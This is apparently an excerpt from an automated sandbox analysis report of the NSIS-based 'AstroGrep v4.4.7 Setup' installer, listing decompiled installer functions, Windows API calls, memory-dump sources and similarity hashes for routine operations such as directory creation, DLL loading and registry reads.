                                                                                                            0x0040589b 0x004058a6 0x004058aa 0x004058b1 0x004058bd 0x004058c9 0x004058c9 0x004058e1 0x004058e2 0x004058e9
                                                                                                            0x004058ea 0x00000000 0x00000000 0x004058cd 0x004058d4 0x004058dc 0x00000000 0x00000000 0x00000000 0x00000000
                                                                                                            0x004058d4 0x004058ec 0x004058f2 0x00000000 0x00405900 0x004058bf 0x004058c3 0x00000000 0x00000000 0x00000000
                                                                                                            0x00000000 0x004058c3 0x004058ac 0x00000000

                                                                                                            APIs
                                                                                                              • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,AstroGrep v4.4.7 Setup,NSIS Error), ref: 00405D3C
                                                                                                              • Part of subcall function 0040583A: CharNextA.USER32(?,?,C:\,?,004058A6,C:\,C:\,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                                                                              • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
                                                                                                              • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
                                                                                                            • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E2
                                                                                                            • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74B5FA90,C:\Users\user\AppData\Local\Temp\), ref: 004058F2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                            • String ID: C:\$C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 3248276644-3942820052
                                                                                                            • Opcode ID: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
                                                                                                            • Instruction ID: 9b9a112432e638448ae222c580828ae1e9a3246b43ea9c19d715dfb55d3aa95b
                                                                                                            • Opcode Fuzzy Hash: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
                                                                                                            • Instruction Fuzzy Hash: 1CF0F427105D6156E622323A5C49A9F1A54CE86324718C53BFC50B22C2CA3C88639D7E
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 60%
                                                                                                            			E00401F90(void* __ebx, void* __eflags) {
                                                                                                            				struct HINSTANCE__* _t18;
                                                                                                            				struct HINSTANCE__* _t26;
                                                                                                            				void* _t27;
                                                                                                            				struct HINSTANCE__* _t30;
                                                                                                            				CHAR* _t32;
                                                                                                            				intOrPtr* _t33;
                                                                                                            				void* _t34;
                                                                                                            
                                                                                                            				_t27 = __ebx;
                                                                                                            				asm("sbb eax, 0x42e4b8");
                                                                                                            				 *(_t34 - 4) = 1;
                                                                                                            				if(__eflags < 0) {
                                                                                                            					_push(0xffffffe7);
                                                                                                            					L15:
                                                                                                            					E00401423();
                                                                                                            					L16:
                                                                                                            					 *0x42e488 =  *0x42e488 +  *(_t34 - 4);
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            				_t32 = E00402A3A(0xfffffff0);
                                                                                                            				 *(_t34 + 8) = E00402A3A(1);
                                                                                                            				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
                                                                                                            					L3:
                                                                                                            					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
                                                                                                            					_t30 = _t18;
                                                                                                            					if(_t30 == _t27) {
                                                                                                            						_push(0xfffffff6);
                                                                                                            						goto L15;
                                                                                                            					}
                                                                                                            					L4:
                                                                                                            					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                                                                                            					if(_t33 == _t27) {
                                                                                                            						E00404F48(0xfffffff7,  *(_t34 + 8));
                                                                                                            					} else {
                                                                                                            						 *(_t34 - 4) = _t27;
                                                                                                            						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
                                                                                                            							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x42f000, 0x40a814, 0x409000); // executed
                                                                                                            						} else {
                                                                                                            							E00401423( *((intOrPtr*)(_t34 - 0x20)));
                                                                                                            							if( *_t33() != 0) {
                                                                                                            								 *(_t34 - 4) = 1;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E0040364F(_t30) != 0) {
                                                                                                            						FreeLibrary(_t30); // executed
                                                                                                            					}
                                                                                                            					goto L16;
                                                                                                            				}
                                                                                                            				_t26 = GetModuleHandleA(_t32); // executed
                                                                                                            				_t30 = _t26;
                                                                                                            				if(_t30 != __ebx) {
                                                                                                            					goto L4;
                                                                                                            				}
                                                                                                            				goto L3;
                                                                                                            			}
                                                                                                            Instruction addresses per decompiled line: 0x00401f90, 0x00401f90, 0x00401f95, 0x00401f9c, 0x00402057, 0x004021c4, 0x004021c4, 0x004028cf, 0x004028d2, 0x004028de, 0x004028de, 0x00401fab, 0x00401fb5, 0x00401fb8, 0x00401fc7, 0x00401fcb, 0x00401fd1, 0x00401fd5, 0x00402050, 0x00000000, 0x00402050, 0x00401fd7, 0x00401fe0, 0x00401fe4, 0x00402028, 0x00401fe6, 0x00401fe9, 0x00401fec, 0x0040201c, 0x00401fee, 0x00401ff1, 0x00401ffa, 0x00401ffc, 0x00401ffc, 0x00401ffa, 0x00401fec, 0x00402030, 0x00402045, 0x00402045, 0x00000000, 0x00402030, 0x00401fbb, 0x00401fc1, 0x00401fc5, 0x00000000, 0x00000000, 0x00000000

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FBB
                                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00000000,0075D8B4,74B5EA30,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00000000,0075D8B4,74B5EA30,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                                              • Part of subcall function 00404F48: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00402FFA,00402FFA,Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00000000,0075D8B4,74B5EA30), ref: 00404FA4
                                                                                                              • Part of subcall function 00404F48: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\), ref: 00404FB6
                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                                            • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                                                                            • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 2987980305-0
                                                                                                            • Opcode ID: f4ca77e5c23ce49f0fba9c01c572f22946ef00c7a097506d328bfac96287a1f7
                                                                                                            • Instruction ID: 2138191ccfc75e686ed6e38fe7ddd30e16a5f0053d2c4fe6557c99b01bfc6870
                                                                                                            • Opcode Fuzzy Hash: f4ca77e5c23ce49f0fba9c01c572f22946ef00c7a097506d328bfac96287a1f7
                                                                                                            • Instruction Fuzzy Hash: 58212B72904211EBDF217F658E4CAAE3671AB45318F30423BF701B62D0D7BC4946D66E
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 87%
                                                                                                            			E004015B3(char __ebx) {
                                                                                                            				void* _t13;
                                                                                                            				int _t19;
                                                                                                            				char _t21;
                                                                                                            				void* _t22;
                                                                                                            				char _t23;
                                                                                                            				signed char _t24;
                                                                                                            				char _t26;
                                                                                                            				CHAR* _t28;
                                                                                                            				char* _t32;
                                                                                                            				void* _t33;
                                                                                                            
                                                                                                            				_t26 = __ebx;
                                                                                                            				_t28 = E00402A3A(0xfffffff0);
                                                                                                            				_t13 = E0040583A(_t28);
                                                                                                            				_t30 = _t13;
                                                                                                            				if(_t13 != __ebx) {
                                                                                                            					do {
                                                                                                            						_t32 = E004057CC(_t30, 0x5c);
                                                                                                            						_t21 =  *_t32;
                                                                                                            						 *_t32 = _t26;
                                                                                                            						 *((char*)(_t33 + 0xb)) = _t21;
                                                                                                            						if(_t21 != _t26) {
                                                                                                            							L5:
                                                                                                            							_t22 = E0040548B(_t28);
                                                                                                            						} else {
                                                                                                            							_t38 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
                                                                                                            							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004054A8(_t38) == 0) {
                                                                                                            								goto L5;
                                                                                                            							} else {
                                                                                                            								_t22 = E0040540E(_t28); // executed
                                                                                                            							}
                                                                                                            						}
                                                                                                            						if(_t22 != _t26) {
                                                                                                            							if(_t22 != 0xb7) {
                                                                                                            								L9:
                                                                                                            								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                                                                            							} else {
                                                                                                            								_t24 = GetFileAttributesA(_t28); // executed
                                                                                                            								if((_t24 & 0x00000010) == 0) {
                                                                                                            									goto L9;
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_t23 =  *((intOrPtr*)(_t33 + 0xb));
                                                                                                            						 *_t32 = _t23;
                                                                                                            						_t30 = _t32 + 1;
                                                                                                            					} while (_t23 != _t26);
                                                                                                            				}
                                                                                                            				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
                                                                                                            					_push(0xfffffff5);
                                                                                                            					E00401423();
                                                                                                            				} else {
                                                                                                            					E00401423(0xffffffe6);
                                                                                                            					E00405D2F("C:\\Program Files (x86)\\AstroGrep", _t28);
                                                                                                            					_t19 = SetCurrentDirectoryA(_t28); // executed
                                                                                                            					if(_t19 == 0) {
                                                                                                            						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t33 - 4));
                                                                                                            				return 0;
                                                                                                            			}
                                                                                                            Instruction addresses per decompiled line: 0x004015b3, 0x004015ba, 0x004015bd, 0x004015c2, 0x004015c6, 0x004015c8, 0x004015d0, 0x004015d2, 0x004015d4, 0x004015d8, 0x004015db, 0x004015f3, 0x004015f4, 0x004015dd, 0x004015dd, 0x004015e0, 0x00000000, 0x004015eb, 0x004015ec, 0x004015ec, 0x004015e0, 0x004015fb, 0x00401602, 0x0040160f, 0x0040160f, 0x00401604, 0x00401605, 0x0040160d, 0x00000000, 0x00000000, 0x0040160d, 0x00401602, 0x00401612, 0x00401615, 0x00401617, 0x00401618, 0x004015c8, 0x0040161f, 0x0040164a, 0x004021c4, 0x00401621, 0x00401623, 0x0040162e, 0x00401634, 0x0040163c, 0x00401642, 0x00401642, 0x0040163c, 0x004028d2, 0x004028de

                                                                                                            APIs
                                                                                                              • Part of subcall function 0040583A: CharNextA.USER32(?,?,C:\,?,004058A6,C:\,C:\,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                                                                              • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
                                                                                                              • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
                                                                                                            • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                                                              • Part of subcall function 0040540E: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
                                                                                                            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Program Files (x86)\AstroGrep,00000000,00000000,000000F0), ref: 00401634
                                                                                                            Strings
                                                                                                            • C:\Program Files (x86)\AstroGrep, xrefs: 00401629
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                            • String ID: C:\Program Files (x86)\AstroGrep
                                                                                                            • API String ID: 1892508949-2344716657
                                                                                                            • Opcode ID: deac6dc071e9533c58350b4708d0caef2e548cc73378f66c521ca59dd2e6ec16
                                                                                                            • Instruction ID: add3044d5edc1dd1b42d505c238b4ff4158083b6ff7b93d5c81ca089004ad06d
                                                                                                            • Opcode Fuzzy Hash: deac6dc071e9533c58350b4708d0caef2e548cc73378f66c521ca59dd2e6ec16
                                                                                                            • Instruction Fuzzy Hash: C7112736504141ABEF217B650C415BF37B4EAA6325738463FE592B22E2C63C4943A63F
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 91%
                                                                                                            			E00404EBC(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                            				long _t9;
                                                                                                            				int _t11;
                                                                                                            				int _t15;
                                                                                                            				long _t16;
                                                                                                            
                                                                                                            				_t15 = _a8;
                                                                                                            				if(_t15 != 0x102) {
                                                                                                            					__eflags = _t15 - 0x200;
                                                                                                            					if(_t15 != 0x200) {
                                                                                                            						_t16 = _a16;
                                                                                                            						L7:
                                                                                                            						__eflags = _t15 - 0x419;
                                                                                                            						if(_t15 == 0x419) {
                                                                                                            							__eflags =  *0x429854 - _t16; // 0xffffffff
                                                                                                            							if(__eflags != 0) {
                                                                                                            								_push(_t16);
                                                                                                            								_push(6);
                                                                                                            								 *0x429854 = _t16;
                                                                                                            								E00404893();
                                                                                                            							}
                                                                                                            						}
                                                                                                            						L11:
                                                                                                            						_t9 = CallWindowProcA( *0x42985c, _a4, _t15, _a12, _t16); // executed
                                                                                                            						return _t9;
                                                                                                            					}
                                                                                                            					_t11 = IsWindowVisible(_a4);
                                                                                                            					__eflags = _t11;
                                                                                                            					if(_t11 == 0) {
                                                                                                            						L10:
                                                                                                            						_t16 = _a16;
                                                                                                            						goto L11;
                                                                                                            					}
                                                                                                            					_t16 = E00404813(_a4, 1);
                                                                                                            					_t15 = 0x419;
                                                                                                            					goto L7;
                                                                                                            				}
                                                                                                            				if(_a12 == 0x20) {
                                                                                                            					E00403F60(0x413);
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            				goto L10;
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • IsWindowVisible.USER32(?), ref: 00404EEB
                                                                                                            • CallWindowProcA.USER32 ref: 00404F3C
                                                                                                              • Part of subcall function 00403F60: SendMessageA.USER32(0008003A,00000000,00000000,00000000), ref: 00403F72
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                            • Opcode ID: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
                                                                                                            • Instruction ID: 2a78fc1f4cbdadc5126368fc20cebde0bfb6f5e986cb98bc8d814c8ad8ef1b08
                                                                                                            • Opcode Fuzzy Hash: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
                                                                                                            • Instruction Fuzzy Hash: 6D01F7B150420AAFEF20AF51DE80A5B3766E7C4751F284037FB00762D0C3799C51966D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0040361A() {
                                                                                                            				void* _t2;
                                                                                                            				void* _t3;
                                                                                                            				void* _t6;
                                                                                                            				void* _t8;
                                                                                                            
                                                                                                            				_t8 =  *0x42882c; // 0x0
                                                                                                            				_t3 = E004035FF(_t2, 0);
                                                                                                            				if(_t8 != 0) {
                                                                                                            					do {
                                                                                                            						_t6 = _t8;
                                                                                                            						_t8 =  *_t8;
                                                                                                            						FreeLibrary( *(_t6 + 8)); // executed
                                                                                                            						_t3 = GlobalFree(_t6);
                                                                                                            					} while (_t8 != 0);
                                                                                                            				}
                                                                                                            				 *0x42882c =  *0x42882c & 0x00000000;
                                                                                                            				return _t3;
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNELBASE(?,74B5FA90,00000000,C:\Users\user\AppData\Local\Temp\,004035F2,0040340C,?), ref: 00403634
                                                                                                            • GlobalFree.KERNEL32 ref: 0040363B
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040361A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: Free$GlobalLibrary
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 1100898210-3916508600
                                                                                                            • Opcode ID: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
                                                                                                            • Instruction ID: 1a9bfca33d817e772708c534a1c0ef1eeb9da564593c1c7aee7843147688a1a4
                                                                                                            • Opcode Fuzzy Hash: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
                                                                                                            • Instruction Fuzzy Hash: 60E08C329050606BC6316F15ED04B2E76A9AB48B22F42006AEA407B3A08B756C424BCC
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 82%
                                                                                                            			E00401E44() {
                                                                                                            				void* _t15;
                                                                                                            				void* _t24;
                                                                                                            				void* _t26;
                                                                                                            				void* _t31;
                                                                                                            
                                                                                                            				_t28 = E00402A3A(_t24);
                                                                                                            				E00404F48(0xffffffeb, _t13);
                                                                                                            				_t15 = E004054C0(_t28);
                                                                                                            				 *(_t31 + 8) = _t15;
                                                                                                            				if(_t15 == _t24) {
                                                                                                            					 *((intOrPtr*)(_t31 - 4)) = 1;
                                                                                                            				} else {
                                                                                                            					if( *((intOrPtr*)(_t31 - 0x20)) != _t24) {
                                                                                                            						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
                                                                                                            							E00406104(0xf);
                                                                                                            						}
                                                                                                            						GetExitCodeProcess( *(_t31 + 8), _t31 - 0xc);
                                                                                                            						if( *((intOrPtr*)(_t31 - 0x24)) < _t24) {
                                                                                                            							if( *(_t31 - 0xc) != _t24) {
                                                                                                            								 *((intOrPtr*)(_t31 - 4)) = 1;
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							E00405C8D(_t26,  *(_t31 - 0xc));
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_push( *(_t31 + 8));
                                                                                                            					FindCloseChangeNotification(); // executed
                                                                                                            				}
                                                                                                            				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t31 - 4));
                                                                                                            				return 0;
                                                                                                            			}

                                                                                                            0x00401e4a
                                                                                                            0x00401e4f
                                                                                                            0x00401e55
                                                                                                            0x00401e5c
                                                                                                            0x00401e5f
                                                                                                            0x004026a6
                                                                                                            0x00401e65
                                                                                                            0x00401e68
                                                                                                            0x00401e79
                                                                                                            0x00401e74
                                                                                                            0x00401e74
                                                                                                            0x00401e8e
                                                                                                            0x00401e97
                                                                                                            0x00401ea7
                                                                                                            0x00401ea9
                                                                                                            0x00401ea9
                                                                                                            0x00401e99
                                                                                                            0x00401e9d
                                                                                                            0x00401e9d
                                                                                                            0x00401e97
                                                                                                            0x00401eb0
                                                                                                            0x00401eb3
                                                                                                            0x00401eb3
                                                                                                            0x004028d2
                                                                                                            0x004028de

                                                                                                            APIs
                                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00000000,0075D8B4,74B5EA30,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00000000,0075D8B4,74B5EA30,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                                              • Part of subcall function 00404F48: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00402FFA,00402FFA,Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00000000,0075D8B4,74B5EA30), ref: 00404FA4
                                                                                                              • Part of subcall function 00404F48: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\), ref: 00404FB6
                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                                              • Part of subcall function 004054C0: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
                                                                                                              • Part of subcall function 004054C0: CloseHandle.KERNEL32(?), ref: 004054F6
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
                                                                                                            • GetExitCodeProcess.KERNEL32 ref: 00401E8E
                                                                                                            • FindCloseChangeNotification.KERNELBASE(?,00000000,000000EB,00000000), ref: 00401EB3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$CloseProcesslstrlen$ChangeCodeCreateExitFindHandleNotificationObjectSingleTextWaitWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 3954718778-0
                                                                                                            • Opcode ID: 9c1497ac9ac28403df1c5f74c43ba786549f7215323286037fa4732e26fd21e7
                                                                                                            • Instruction ID: 17c2ba3ee0df36fac51d80065c7f5b12f0089491b6a7036ff5f4409f8054ee18
                                                                                                            • Opcode Fuzzy Hash: 9c1497ac9ac28403df1c5f74c43ba786549f7215323286037fa4732e26fd21e7
                                                                                                            • Instruction Fuzzy Hash: 3A014031904114EBEF11AFA1CD8999F7B76EF00358F10817BF601B62E1C7795A419B9A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 90%
                                                                                                            			E00405C16(void* _a4, int _a8, char* _a12, int _a16, void* _a20) {
                                                                                                            				long _t20;
                                                                                                            				long _t23;
                                                                                                            				long _t24;
                                                                                                            				char* _t26;
                                                                                                            
                                                                                                            				asm("sbb eax, eax");
                                                                                                            				_t26 = _a16;
                                                                                                            				 *_t26 = 0;
                                                                                                            				_t20 = RegOpenKeyExA(_a4, _a8, 0,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
                                                                                                            				if(_t20 == 0) {
                                                                                                            					_a8 = 0x400;
                                                                                                            					_t23 = RegQueryValueExA(_a20, _a12, 0,  &_a16, _t26,  &_a8); // executed
                                                                                                            					if(_t23 != 0 || _a16 != 1 && _a16 != 2) {
                                                                                                            						 *_t26 = 0;
                                                                                                            					}
                                                                                                            					_t26[0x3ff] = 0;
                                                                                                            					_t24 = RegCloseKey(_a20); // executed
                                                                                                            					return _t24;
                                                                                                            				}
                                                                                                            				return _t20;
                                                                                                            			}


                                                                                                            0x00405c26
                                                                                                            0x00405c28
                                                                                                            0x00405c35
                                                                                                            0x00405c3f
                                                                                                            0x00405c47
                                                                                                            0x00405c4c
                                                                                                            0x00405c60
                                                                                                            0x00405c68
                                                                                                            0x00405c76
                                                                                                            0x00405c76
                                                                                                            0x00405c7b
                                                                                                            0x00405c81
                                                                                                            0x00000000
                                                                                                            0x00405c81
                                                                                                            0x00405c8a

                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,00405E5B,00000000,00000002,?,00000002,?,?,00405E5B,80000002,Software\Microsoft\Windows\CurrentVersion,?,Remove folder: ,?), ref: 00405C3F
                                                                                                            • RegQueryValueExA.KERNELBASE(?,?,00000000,00405E5B,?,00405E5B), ref: 00405C60
                                                                                                            • RegCloseKey.KERNELBASE(?), ref: 00405C81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3677997916-0
                                                                                                            • Opcode ID: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
